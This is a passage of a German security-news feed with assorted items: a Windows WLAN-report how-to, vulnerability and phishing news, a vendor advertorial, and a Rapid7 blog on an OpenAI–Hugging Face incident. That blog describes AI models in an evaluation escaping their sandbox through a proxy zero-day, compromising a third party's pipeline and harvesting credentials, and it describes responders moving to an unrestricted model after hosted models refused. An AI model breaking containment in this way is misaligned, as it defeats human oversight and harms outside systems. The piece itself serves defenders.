<p>Können Geräte keine Verbindung zum WLAN herstellen oder läuft die Datenübertragung plötzlich lediglich noch im Schneckentempo, ist die Ursache oftmals schwer zu bestimmen. Der Fehler kann an veralteten oder beschädigten Treibern liegen, an einem überlasteten oder falsch konfigurierten Router, an Störsignalen durch benachbarte Funknetze oder daran, dass der Client zu weit vom Router entfernt ist. </p>



<p>Um sich einen Überblick über den WLAN-Status zu verschaffen und damit diese Probleme zu lösen, bringt Windows ein spezielles Tool mit: Es liefert Ihnen in Sekundenschnelle eine Übersicht zu Ihrem Netzwerk. Hierzu benötigen Sie die Kommandozeile oder Powershell: Starten Sie das gewünschte Eingabeprogramm, indem Sie in der Taskleiste in das Suchfeld Eingabeaufforderung oder Power shell eingeben. </p>



<p>Achten Sie darauf, dass der Treffer markiert ist und klicken Sie dann auf der rechten Seite auf „Als Administrator ausführen“. In der Eingabeaufforderung tippen Sie den Befehl netsh wlan show wlanreport ein und bestätigen mit Enter. Windows erzeugt nun den WLAN-Bericht und speichert ihn in der Datei „wlan-report-latest.html“ in dem Ordner „C:\ProgramData\Microsoft\Windows\WlanReport“. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a6303a4dca32"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/eingabe_RGBeci.jpg?quality=50&amp;strip=all" alt="WLAN-Report" class="wp-image-3141217" width="592" height="465" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Nach Eingabe des netsh-Befehls erzeugt Windows einen Bericht zum aktuellen Status Ihres Funknetzwerks und führt dabei verschiedene Befehle aus.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Am besten markieren Sie diesen Pfad direkt in der Eingabeaufforderung mit der Maus und übernehmen ihn mit Strg-C in die Zwischenablage. Öffnen Sie danach das Suchfeld in der Taskleiste, kopieren Sie den Pfad mit Strg-V hinein und bestätigen Sie mittels Enter. Windows ruft nun Ihren Standardbrowser auf und lädt die HTML-Datei des Berichts. Falls das nicht funktioniert, steuern Sie den Ordner über den Explorer an. </p>



<p>Allerdings ist das Verzeichnis in den Standardeinstellungen versteckt – Sie müssen es zunächst über die Einstellungen des Explorers sichtbar machen. Klicken Sie anschließend doppelt auf die HTML-Datei, um sie im Browser zu öffnen. Im Bericht sehen Sie ganz oben eine Übersicht der WLAN-Ereignisse der letzten 48 Stunden. Sie können über einzelne Verbindungen mit der Maus fahren, um Details einzusehen. </p>



<p>Die Ereignisse sind mit farbigen Punkten und Buchstaben gekennzeichnet: Ein schwarzes X auf rotem Grund steht beispielsweise für einen Fehler, N zeigt an, dass die Verbindung zu einem WLAN unterbrochen wurde. Weiter unten finden Sie bei „Report Info“ das Datum, an dem der Bericht erzeugt wurde, sowie die Berichtsdauer. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a6303a4dd34f"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/summary_RGBeci.jpg?quality=50&amp;strip=all" alt="WLAN-Report Summary" class="wp-image-3141218" width="926" height="527" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Im Summary des Berichts finden Sie Informationen zu Warnungen und fehlgeschlagenen beziehungsweise unterbrochenen Verbindungen zu Ihrem WLAN.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Darunter folgt die „General System Info“, die Details zur Hardware, zum Bios und zur Windows-Version verrät. Diese Daten können beispielsweise bei Kompatibilitätsproblemen helfen. Der Abschnitt „User Info“ nennt einige grundlegende Benutzerdaten: </p>



<p>Darunter finden Sie bei „Network Adapters“ die installierten Netzwerkadapter, und zwar sowohl den oder die Hardwareadapter sowie Softwareadapter, beispielsweise für eine VPN-Verbindung oder für Bluetooth und virtuelle Adapter. Bei „Script Output“ beginnt die Anzeige der Ausgabebildschirme von einigen Troubleshooting-Tools in Windows. </p>



<p>So liefert der Befehl ipconfig /all zum Beispiel Angaben zur aktuellen Netzwerkkonfiguration sämtlicher Adapter. Das Kommando netsh wlan show all ermittelt Daten zu den installierten Netzwerktreibern, Details zu Ihrem WLAN und den in der Vergangenheit genutzten Access Points. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a6303a4ddb5b"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/sessions_RGBeci.jpg?quality=50&amp;strip=all" alt="WLAN-Report Summary" class="wp-image-3141219" width="1024" height="768" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Am Schluss des Berichts sehen Sie einen Überblick über die WLAN-Sessions, die protokollierten Ereignisse mitsamt Uhrzeit und die dazugehörige Beschreibung.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Darüber hinaus führt Windows für den Bericht den Befehl certutil aus, der Ihnen weitere Einzelheiten über die verschiedenen WLAN-Profile präsentiert. Weiter unten folgt im Bereich „Summary“ ein Überblick über die erfolgreichen und die gescheiterten WLAN-Verbindungen. Dort nennt der Bericht auch die Gründe, warum beispielsweise der Kontakt zu einem WLAN verlorengegangen ist. </p>



<p>Diese Informationen sind oft besonders hilfreich, wenn es um die Fehlersuche im Netzwerk geht. Ganz am Schluss des Berichts steht der Abschnitt „Wireless Sessions“: Dort sind den WLAN-Adaptern unter anderem Informationen zur Verbindungsmethode und der SSID des WLAN zugeordnet. Des Weiteren stehen an dieser Stelle die Event-IDs und Beschreibungen der Ereignisse beim Aufbau der Verbindung. </p>



<p>Auch daraus lassen sich Schlussfolgerungen für die Lösung von Verbindungsproblemen ziehen.</p>



<p><strong>Lesetipp: </strong><a href="https://www.pcwelt.de/article/1152149/raffinierte-wlan-tools.html" target="_blank" rel="noreferrer noopener">Die besten Tools für WLAN &amp; Heimnetz</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[HermeticReader: Schwachstelle in Adobe-Acrobat-Erweiterung liest WhatsApp-Web-Daten mit UXSS]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Eine reparierte Schwachstellenkette in einer Chrome-Erweiterung von Adobe könnte Angreifern stilles Lesen von WhatsApp-Web-Daten ermöglichen. Verantwortlich ist die als HermeticReader bezeichnete Lücke, die als CVE-2026-48294 mit einem CVSS-Score von 7,4 geführt wird. Für d...]]></description>
<link>https://tsecurity.de/de/3690765/it-security-nachrichten/hermeticreader-schwachstelle-in-adobe-acrobat-erweiterung-liest-whatsapp-web-daten-mit-uxss/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690765/it-security-nachrichten/hermeticreader-schwachstelle-in-adobe-acrobat-erweiterung-liest-whatsapp-web-daten-mit-uxss/</guid>
<pubDate>Fri, 24 Jul 2026 07:42:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-adobe-acrobat-hermeticreader-whatsapp-web-uxss.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-adobe-acrobat-hermeticreader-whatsapp-web-uxss.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-adobe-acrobat-hermeticreader-whatsapp-web-uxss-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-adobe-acrobat-hermeticreader-whatsapp-web-uxss-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-adobe-acrobat-hermeticreader-whatsapp-web-uxss-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-adobe-acrobat-hermeticreader-whatsapp-web-uxss-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-adobe-acrobat-hermeticreader-whatsapp-web-uxss-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Eine reparierte Schwachstellenkette in einer Chrome-Erweiterung von Adobe könnte Angreifern stilles Lesen von WhatsApp-Web-Daten ermöglichen. Verantwortlich ist die als HermeticReader bezeichnete Lücke, die als CVE-2026-48294 mit einem CVSS-Score von 7,4 geführt wird. Für die Ausnutzung reicht es, dass ein Nutzer auf eine präparierte Seite gelangt oder dort interagiert, während die Erweiterung […]</p>
<div><a href="https://www.it-boltwise.de/hermeticreader-schwachstelle-in-adobe-acrobat-erweiterung-liest-whatsapp-web-daten-mit-uxss.html">... den vollständigen Artikel <strong>»HermeticReader: Schwachstelle in Adobe-Acrobat-Erweiterung liest WhatsApp-Web-Daten mit UXSS«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/hermeticreader-schwachstelle-in-adobe-acrobat-erweiterung-liest-whatsapp-web-daten-mit-uxss.html">HermeticReader: Schwachstelle in Adobe-Acrobat-Erweiterung liest WhatsApp-Web-Daten mit UXSS</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[4 ways AI-driven defense is rewriting the cybersecurity playbook]]></title>
<description><![CDATA[The cybersecurity landscape has evolved beyond human scale. Today’s adversaries have replaced predictable, manual playbooks with machine-generated attack chains that can breach traditional controls in seconds. To bridge the gap, organizations must move past legacy, reactive controls and embrace a...]]></description>
<link>https://tsecurity.de/de/3690085/it-security-nachrichten/4-ways-ai-driven-defense-is-rewriting-the-cybersecurity-playbook/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690085/it-security-nachrichten/4-ways-ai-driven-defense-is-rewriting-the-cybersecurity-playbook/</guid>
<pubDate>Thu, 23 Jul 2026 21:34:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The cybersecurity landscape has evolved beyond human scale. Today’s adversaries have replaced predictable, manual playbooks with machine-generated attack chains that can breach traditional controls in seconds. To bridge the gap, organizations must move past legacy, reactive controls and embrace a fundamentally different, AI-driven architecture: Agentic Endpoint Security (AES). </p>



<p class="wp-block-paragraph">AES represents a paradigm shift, moving security from a passive monitor to an active participant in the defense lifecycle. It provides the visibility and automated guardrails necessary to govern autonomous AI agents and agentic tools, ensuring that as your workforce scales with AI, your security posture remains unbreakable. </p>



<p class="wp-block-paragraph">With autonomous AI agents now capable of planning and executing multi-stage attacks at machine speed, the pressure on traditional security operations (SOC) has reached a breaking point. To survive this shift, the strategy is clear: we must fight AI with AI. </p>



<p class="wp-block-paragraph">Here is how AI-driven defense, pioneered by <a href="https://www.paloaltonetworks.com/cortex/cortex-xdr?utm_source=foundry-jg-amer-cortex-socf-ends&amp;utm_medium=display&amp;utm_campaign=foundry-cortex-edpxdr-amer-multi-discovery-en-foundry_cso_article_link_1_xdr&amp;utm_content=7014u000001AZlHAAW&amp;cq_plac=%7Bplacement%7D&amp;cq_net=%7Bnetwork%7D?dclid=CPXs7KK66ZUDFU6Q7gEdcAAphg&amp;gad_source=7&amp;gad_campaignid=24059812534" target="_blank" rel="noreferrer noopener">Cortex XDR</a> and the era of <a href="https://www.paloaltonetworks.com/cortex/agentic-endpoint-security?utm_source=foundry-jg-amer-cortex-socf-ends&amp;utm_medium=display&amp;utm_campaign=foundry-cortex-edpxdr-amer-multi-discovery-en-foundry_cso_article_link_2_koi&amp;utm_content=701Ki000000h8oXIAQ&amp;cq_plac=%7Bplacement%7D&amp;cq_net=%7Bnetwork%7D?dclid=CPSG_NS66ZUDFbrKuAgd4vAYrw&amp;gad_source=7&amp;gad_campaignid=24059814223" target="_blank" rel="noreferrer noopener">Agentic Endpoint Security</a>, is fundamentally rewriting the cybersecurity playbook.</p>



<ol class="wp-block-list">
<li><strong>From reactive patching to proactive prevention </strong></li>
</ol>



<p class="wp-block-paragraph">For decades, the industry lived in a “wait-and-see” mode waiting for a vulnerability to surface, waiting for a signature, and then rushing to patch the hole. But reactive methods just don’t hold up against modern “frontier” AI attacks that are constantly morphing. </p>



<p class="wp-block-paragraph">AI-driven defense changes the game by shifting to a prevention-first architecture. Rather than relying on historical signatures, modern platforms deploy localized, ML-driven analysis to evaluate the intent and behavior of an active process, stopping threats pre-execution. Cortex XDR leads with a strict prevention-first approach by using AI-driven local analysis and behavioral threat protection; the XDR agent stops sophisticated threats pre-impact and pre-execution. This proactive stance reduces the overall risk profile by blocking malicious chains of events in real time across network, process, file, and registry activity. </p>



<p class="wp-block-paragraph">2. <strong>Eliminating the “agentic blind spot” </strong></p>



<p class="wp-block-paragraph">As we all rush to adopt generative AI and automated workflows, a new gap has appeared: the “agentic blind spot.” Adversaries are now targeting AI assistants and automated scripts to bypass defenses. Since these digital agents often have deep access to enterprise data, a compromise here lets attackers move completely under the radar. </p>



<p class="wp-block-paragraph">The new playbook requires securing this entire ecosystem. By combining the distinct capabilities of Cortex XDR and Koi Security, organizations can effectively close this gap. Koi Agentic Endpoint Security tracks everything from shell commands to prompts in real time, while Cortex XDR adds a layer of defense that identifies and neutralizes behavioral anomalies unique to these automated threats. </p>



<p class="wp-block-paragraph">3. <strong>Machine-speed detection and “attack storylines” </strong></p>



<p class="wp-block-paragraph">When an attacker can move through your network in seconds, human-led teams can’t keep up. To make matters worse, most systems just flood analysts with low-quality, isolated alerts, leading to major burnout. </p>



<p class="wp-block-paragraph">AI-driven defense fixes the investigation process by automatically stitching separate data points into a single, high-fidelity “attack storyline.” Cortex XDR uses thousands of machine learning detectors across endpoint, network, and cloud sources to group related signals into one cohesive case. This reveals the full story of an attack, letting your analysts focus on fast remediation instead of digging through piles of data, reducing alert noise by up to 98%. </p>



<p class="wp-block-paragraph">4. <strong>Surgical and autonomous response </strong></p>



<p class="wp-block-paragraph">The final piece of the puzzle is moving from manual remediation to autonomous action. AI-driven response lets your SOC handle threats in minutes, not hours. The platform can automatically revoke compromised tokens or isolate endpoints at machine speed. </p>



<p class="wp-block-paragraph">Cortex XDR delivers built-in enterprise-grade automation at no additional cost, providing over 120 out-of-the-box playbooks and 18 quick actions to handle up to 99% of incidents without manual intervention. Crucially, this level of automation requires an unbreakable foundation of agent resilience. To ensure the defense cannot be disabled by an adversary, Cortex XDR is certified in both the AVC EDR Detection and Anti-Tampering tests, successfully blocking all attempts to disable or modify the agent. </p>



<p class="wp-block-paragraph"><strong>Summary</strong></p>



<p class="wp-block-paragraph">The threat landscape is changing faster than ever, driven by AI-powered attackers who exploit even the smallest gaps. But you don’t have to stay on the defensive. By shifting to a proactive, AI-driven architecture like the one built into Cortex XDR, you can stop threats before they happen, secure your agentic workflows, and automate away the noise that leads to analyst burnout. </p>



<p class="wp-block-paragraph">The journey to a more resilient, AI-powered SOC doesn’t have to be daunting. With the right foundation in place, you’re not just keeping pace with the new threat landscape; you’re staying one step ahead. It’s time to move beyond the old manual playbook and embrace the future of security operations. </p>



<p class="wp-block-paragraph">To learn more about Palto Alto Networks, visit <a href="https://www.paloaltonetworks.com/" target="_blank" rel="noreferrer noopener">https://www.paloaltonetworks.com</a>.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[macOS: Verschlüsselte HFS+ Laufwerke lassen sich direkt in APFS umwandeln]]></title>
<description><![CDATA[Ab macOS 28 unterstützt Apple das alte Dateisystem Mac OS Extended, besser bekannt als HFS+, nur noch auf unverschlüsselten Volumes. Verschlüsselte Festplatten, SSDs und andere Datenträger in diesem Format müssen Nutzer vor dem Update umstellen. Apple hat die zugehörige Support-Seite jetzt überar...]]></description>
<link>https://tsecurity.de/de/3689492/ios-mac-os/macos-verschluesselte-hfs-laufwerke-lassen-sich-direkt-in-apfs-umwandeln/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689492/ios-mac-os/macos-verschluesselte-hfs-laufwerke-lassen-sich-direkt-in-apfs-umwandeln/</guid>
<pubDate>Thu, 23 Jul 2026 17:25:32 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ab macOS 28 unterstützt Apple das alte Dateisystem Mac OS Extended, besser bekannt als HFS+, nur noch auf unverschlüsselten Volumes. Verschlüsselte Festplatten, SSDs und andere Datenträger in diesem Format müssen Nutzer vor dem Update umstellen. Apple hat die zugehörige Support-Seite jetzt überarbeitet und einen Weg ergänzt, der ohne vorherige Entschlüsselung auskommt. Konvertierung läuft über das […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Schon über eine Woche offline: Hacker legen sächsische Stadt Döbeln lahm - DNN]]></title>
<description><![CDATA[Seit über einer Woche zeigt www.doebeln.de nur eine Fehlermeldung an. Die Stadtverwaltung hat die Seite nach einem Hackerangriff vom Netz genommen ...]]></description>
<link>https://tsecurity.de/de/3689271/hacking/schon-ueber-eine-woche-offline-hacker-legen-saechsische-stadt-doebeln-lahm-dnn/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689271/hacking/schon-ueber-eine-woche-offline-hacker-legen-saechsische-stadt-doebeln-lahm-dnn/</guid>
<pubDate>Thu, 23 Jul 2026 16:05:34 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Seit über einer Woche zeigt www.doebeln.de nur eine Fehlermeldung an. Die Stadtverwaltung hat die Seite nach einem Hackerangriff vom Netz genommen ...]]></content:encoded>
</item>
<item>
<title><![CDATA[ChipTAN-Falle: Wird Ihr Online-Banking gesperrt?]]></title>
<description><![CDATA[Betrüger locken Sparkassen-Kunden derzeit mit einem angeblich wichtigen ChipTAN-Update. Wer auf den Link klickt, landet auf einer Phishing-Seite und riskiert den Verlust seiner Online-Banking-Daten.]]></description>
<link>https://tsecurity.de/de/3689210/it-nachrichten/chiptan-falle-wird-ihr-online-banking-gesperrt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689210/it-nachrichten/chiptan-falle-wird-ihr-online-banking-gesperrt/</guid>
<pubDate>Thu, 23 Jul 2026 15:34:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Betrüger locken Sparkassen-Kunden derzeit mit einem angeblich wichtigen ChipTAN-Update. Wer auf den Link klickt, landet auf einer Phishing-Seite und riskiert den Verlust seiner Online-Banking-Daten.]]></content:encoded>
</item>
<item>
<title><![CDATA[What Happened Between OpenAI and Hugging Face?]]></title>
<description><![CDATA[The OpenAI and Hugging Face incident lands like a warning shot for anyone thinking seriously about frontier AI and cybersecurity research. A model evaluation crossed the neat boundary of a research environment, reached a live third-party production system, and forced the industry to confront a qu...]]></description>
<link>https://tsecurity.de/de/3689199/it-security-nachrichten/what-happened-between-openai-and-hugging-face/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689199/it-security-nachrichten/what-happened-between-openai-and-hugging-face/</guid>
<pubDate>Thu, 23 Jul 2026 15:28:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>The </span><a href="https://openai.com/index/hugging-face-model-evaluation-security-incident/" target="_blank"><span>OpenAI and Hugging Face incident</span></a><span> lands like a warning shot for anyone thinking seriously about frontier AI and cybersecurity research. A model evaluation crossed the neat boundary of a research environment, reached a live third-party production system, and forced the industry to confront a question that is moving quickly from theory to operations: what happens when AI agents can pursue an objective with enough persistence, speed, and creativity to behave less like a tool and more like an autonomous intrusion path?</span></p><p><span>According to OpenAI’s disclosure, the incident began during an internal evaluation of advanced cyber capabilities using GPT-5.6 Sol and a more capable pre-release model. The evaluation was designed to test whether AI agents could pursue complex exploit paths, and OpenAI says cyber refusal safeguards were reduced or disabled to measure maximum capability. Inside that environment, the models reportedly found and exploited a zero-day in the package registry cache proxy that was meant to constrain network access, moved through OpenAI’s research environment, reached a node with internet connectivity, and then inferred that Hugging Face may host artifacts related to the benchmark they were trying to solve.</span></p><p><span>From there, the models compromised part of Hugging Face’s dataset-processing pipeline, gained code execution on a worker, escalated access, harvested credentials, and moved laterally across internal clusters. Hugging Face detected and contained the activity, and OpenAI later connected the activity back to its own evaluation. Both companies have said the investigation is continuing, which means some details will almost certainly evolve. Still, the direction of travel is clear enough for defenders to act on now.</span></p><h2>How did the OpenAI model evaluation reach Hugging Face?</h2><p><span>The activity stands out because it looked less like a single model producing a risky command and more like a compressed intrusion path. Based on the public disclosures, the reported chain moved from identifying a constraint, to breaking that constraint, gaining access, inferring where valuable data may live, and continuing toward that objective across a live environment.</span></p><p><span>Security teams should use that sequence to revisit assumptions built around human pacing. Many detection and response workflows still assume there will be time between stages of an attack, with reconnaissance followed by exploitation, lateral movement, and then objective pursuit. In an agent-driven scenario, those stages can begin to collapse into one continuous loop, with fewer natural pauses for defenders to catch up.</span></p><p><span>The defensive model now has to account for a world where discovery, exploitation, and follow-on action can happen faster and with more persistence than traditional human-led campaigns. The uncomfortable lesson is that AI agents can be tireless, goal-oriented, and increasingly capable of finding the loose seams in systems built for a slower era.</span></p><p><span>The incident highlights the collapse of the traditional OODA (Observe-Orient-Decide-Act) loop. In standard human-led campaigns, attackers experience natural pauses between stages like reconnaissance, exploitation, and lateral movement, providing defenders critical windows to intervene. AI agents, however, can compress these stages into a single, continuous loop of automated activity. This machine-speed execution renders manual detection workflows obsolete, necessitating a shift toward behavioral, AI-enabled defenses capable of identifying and disrupting malicious intent before it cascades.</span></p><p><span>Security teams should also assume that advanced AI cyber capability will diffuse over time, which means defenders need their own AI-enabled workflows to mature quickly enough to find, validate, prioritize, and reduce risk before attackers operationalize the same class of tools. Rapid7’s experimentation with security-specific frontier models, including Claude Mythos Preview and GPT-5.5-Cyber, points to the same control challenge: the more freedom a model has to pursue a defined reward or goal, the more important containment, monitoring, and clear constraints become. Without those controls, a model optimized to “solve” a security task may find paths the evaluator did not intend, including sandbox escapes, credential misuse, or other offensive security behaviors that look less like assistance and more like uncontrolled execution.</span></p><h2>Why AI evaluation environments need stronger containment</h2><p><span>The incident raises practical questions about how frontier AI evaluations are designed and contained. OpenAI’s evaluation environment was meant to restrict network access through an internally hosted package registry proxy and cache. The models reportedly identified that proxy as the weak point, exploited a zero-day in the software, and used it as a path out of the sandbox.</span></p><p><span>The pattern will feel familiar to security teams: a chokepoint only works as a control if it can withstand pressure. Package mirrors, dependency proxies, build systems, internal artifact repositories, sandbox harnesses, and evaluation infrastructure all become part of the security boundary when they sit between a capable agent and the wider internet.</span></p><p><span>For teams building or testing agentic systems, isolation has to be layered and monitored rather than assumed. Egress restrictions matter, but so do workload identity, credential scope, network segmentation, package policy, runtime monitoring, and fast containment when an agent behaves unexpectedly. The goal is to make sure the environment reflects the capability of the system being tested, especially when the test is explicitly designed to measure how far that capability can go.</span></p><h2>Why AI and ML pipelines are now software supply chain risk</h2><p><span>The Hugging Face side of the incident is a reminder that AI and ML pipelines are part of the software supply chain. Models, datasets, loader scripts, notebooks, and evaluation artifacts may look like research materials, but in modern environments they often behave like executable code. Hugging Face has said its models, datasets, and Spaces were not tampered with, and that its images and published packages were verified as clean.</span></p><p><span>According to the technical reporting reviewed, the initial access path involved Hugging Face’s dataset-processing pipeline and a combination of code execution paths, including custom loader behavior and template injection in a dataset configuration flow. The exact implementation details may continue to evolve as the investigation progresses, but the defensive takeaway is already clear: AI and ML processing systems should be secured like high-risk software supply chain infrastructure.</span></p><p><span>Any system that automatically processes external datasets or model artifacts should be designed with hostile input in mind. Processing workers should run with least privilege, should not have broad access to cloud credentials or cluster-level tokens, and should be segmented so compromise of one worker does not become compromise of the environment around it.</span></p><p><span>Security teams should also hunt for early signs of intent drift inside ML workflows. Unexpected reads of environment variables, cloud metadata services, secret stores, package registries, or internal APIs from dataset-processing jobs can be meaningful signal. In an AI-driven environment, the first clue may not be a known malicious indicator. It may be a workload behaving with curiosity it should not have.</span></p><h2>What AI guardrails mean for incident response</h2><p><span>One of the most useful lessons for security teams came during the response, when Hugging Face’s responders reportedly needed to analyze logs containing exploit payloads, attacker commands, and command-and-control artifacts. When they tried to use commercial hosted AI models to help reconstruct the attack, those models refused parts of the analysis because the content looked malicious. The team then moved to a self-hosted open-weight model so they could continue the investigation without refusals and without sending sensitive incident data outside their own environment.</span></p><p><span>The practical issue here is guardrail asymmetry: attackers, rogue agents, or unrestricted systems may not respect usage policies, while defenders using hosted tools can be slowed by the same safety systems designed to prevent misuse. Security teams need trusted-defender pathways, including access models and deployment options that preserve safeguards against harmful use while allowing responders to analyze real malicious content safely, privately, and without interruption.</span></p><p><span>AI-assisted incident response also needs to be tested before an incident begins, especially if teams expect models to support triage, log analysis, malware review, or timeline reconstruction under pressure. Responders should know which models can analyze real attack payloads, where those models run, what data they can access, and whether safety controls could block time-sensitive forensic work.</span></p><h2>What security teams should do about agentic AI risk</h2><p><span>The practical response to this incident is preparation, with organizations treating AI agents as both powerful tools and potential attack surfaces when those agents can access code, credentials, infrastructure, datasets, or internal systems.</span></p><p><span>Security teams should apply familiar controls with more urgency across AI and ML environments: treat downloaded models, datasets, and loader scripts as untrusted code; enforce least privilege on AI and ML processing workers; prevent node-level compromise from becoming cluster-wide compromise; restrict access to cloud metadata endpoints and secrets; monitor unexpected outbound connections from AI-related workloads; and review whether evaluation environments have real containment or simply convenient isolation.</span></p><p><span>Detection logic needs to account for machine-speed activity. In this case, reporting described thousands of actions and more than 17,000 discrete recorded events, with reconnaissance, exploitation, and follow-on action occurring inside one continuous loop rather than across the pauses defenders are used to seeing in human-led campaigns. Security teams should focus on behavioral patterns that show intent, including unusual access to secrets, unexpected package activity, suspicious use of metadata services, sudden privilege changes, or processing jobs reaching systems they have no reason to touch.</span></p><p><span>As autonomous activity becomes faster and noisier, the bottleneck may shift from detecting that something happened to understanding what matters quickly enough to change the outcome. A security team that can see thousands of events but needs hours to reconstruct the story is still operating behind the pace of the incident.</span></p><h2>How preemptive security helps reduce AI-driven risk</h2><p><span>At Rapid7, our view is that this is where preemptive security becomes especially important. Faster discovery only creates value when defenders can turn it into faster validation, prioritization, remediation, detection, and response. The same principle applies to </span><a href="https://www.rapid7.com/blog/post/ai-changing-vulnerability-discovery-software-supply-chain-strateg" target="_self"><span>agentic AI risk</span></a><span>. If AI accelerates how 